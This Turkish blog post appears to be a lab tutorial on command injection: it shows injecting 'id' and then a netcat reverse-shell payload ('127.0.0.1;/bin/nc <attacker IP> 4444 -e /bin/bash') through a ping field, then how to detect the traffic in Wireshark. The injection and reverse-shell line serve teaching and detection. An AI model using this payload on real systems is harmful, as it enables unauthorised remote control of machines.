Command Injection ve Analizi

Bu yazımızda bir commdand injection saldırısı yapıp wiresharkta analiz edeceğiz.İlk olarak Command Injection ne olduğuna bakalım , Command Injection zafiyet bulunduran bir uygulama üzerinde hedef sistemde istediği komutları çalıştırabilmesine denir.Bu komutlar Windows CMD , Linux terminal üzerinde çalıştırılan komutlar olarak diyebiliriz.İlk olarak komut çalıştırmayı deneyelim.

SALDIRI AŞAMASI

127.0.0.1 IP adresine bir ping gönderme işlemi gerçekleştirdik ve çıktıda ttl değeri 64 olarak geldiği için sistemde bir linux işletim sistemi olabileceği düşünülmüştür.
Bir id komutu çalıştırmayı denedik ve dönen cevapta görüldüğü üzere uid=33 dönüşü sağlanmıştır.Şimdi de kendimize bağlantı alabilmek için bir netcat sorgulaması yapacağız.

Netcat (nc) portları tarayabilen, hedef sistemlerle ilgili bilgi toplayan, bilgisayarları ele geçirmek için arka kapıları kullanan veya dosya transferleri yapabilen bir araçtır. Linux veya Windows’ta kullanılabilir. Yukarıdaki görselde netcatin hangi dizinde olduğunu sorgulaması gerçekleştirdik ve bir sonraki adımda kendimize bir bağlantı oluşturacağız.

Buradaki komut açıklayacak olursak 127.0.0.1;/bin/nc 192.168.10.131 4444 -e /bin/bash 
  • /bin/nc = Netcatin bulunduğu dizin
  • 192.168.10.131 4444 = Bağlantıyı dinleyeceğimiz(saldırgan) IP adresine ve Portu
  • -e = netcate bir komut çalıştırmasını söylüyoruz
  • /bin/bash = netcate çalıştırmasını istediğimiz komut yani hedef makinede bize bir bash kabuğu aç diyoruz .

WİRESHARK AŞAMASI

HTTP filtresi uygulayak POST methodlarını inceleyebiliriz ve hangi komutların çalıştırıldığını görebiliriz bunun için yapmamız gereken POST paketine sağ tıklayıp HTTP streami görüntüleyip oradan bakmaktır. 
Zaafiyet için çalıştırılan komutları görmekteyiz.Şimdi de alınan reverse shelli tespit etmeyi ve sonrasında çalıştırılan komutları inceleyelim
Reverse shell tespiti için tcp.flags.ack == 1 and tcp.flags.push ==1 filtresini uyguladık ve psh,ack paketini TCP stream ile açtık.

Son olarak da revershell alındıktan sonra çalıştırılan komutları görüntüledik.

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir